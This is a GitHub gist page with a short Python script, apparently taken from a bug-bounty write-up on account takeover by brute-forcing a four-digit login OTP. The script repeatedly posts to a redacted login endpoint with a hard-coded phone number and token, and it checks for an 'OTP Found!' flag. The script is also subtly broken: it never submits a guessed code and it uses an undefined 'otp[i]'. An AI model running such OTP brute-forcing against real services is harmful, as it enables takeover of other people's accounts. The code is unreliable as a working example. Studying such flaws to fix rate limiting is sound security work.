Created
December 27, 2020 18:51
-
-
Save ayubmetah/7da1cd81e55ee721b41e4bad2343227b to your computer and use it in GitHub Desktop.
The code below is from Suraj Bhosale's write-up regarding Account takeover via login with OTP. There are 10,000 possible combinations that the digits 0-9 can be arranged into to form a four-digit code. Script originally written by @suraj-bhosale-876b2937
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def generateotp(): | |
| otp_found = 0 | |
| while otp_found == 0: | |
| Endpoint = "https://api.redacted.com/v3/users/login" | |
| #Generate new OTP Post data to be sent | |
| payload = {"uemail":"","password":"","umobile":"0720619878"} | |
| headers = {"temptoken": "8fa1db6aa4652f6124062f9ca1d2c5b1a6da199f", "Connection": "close"} | |
| #Generating New otp | |
| r = requests.post(url = Endpoint, data=json.dumps(payload), headers=headers) | |
| soup = BS(r.text, "html.parser") | |
| p_dict = json.loads(str(soup).strip()) | |
| print(p_dict) | |
| if p_dict["flag"] == "0": | |
| print("incorrect otp") | |
| continue | |
| elif p_dict["flag"] == 1: | |
| print("OTP Found!") | |
| print(otp[i]) | |
| otp_found = 1 | |
| exit() | |
| generateotp() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment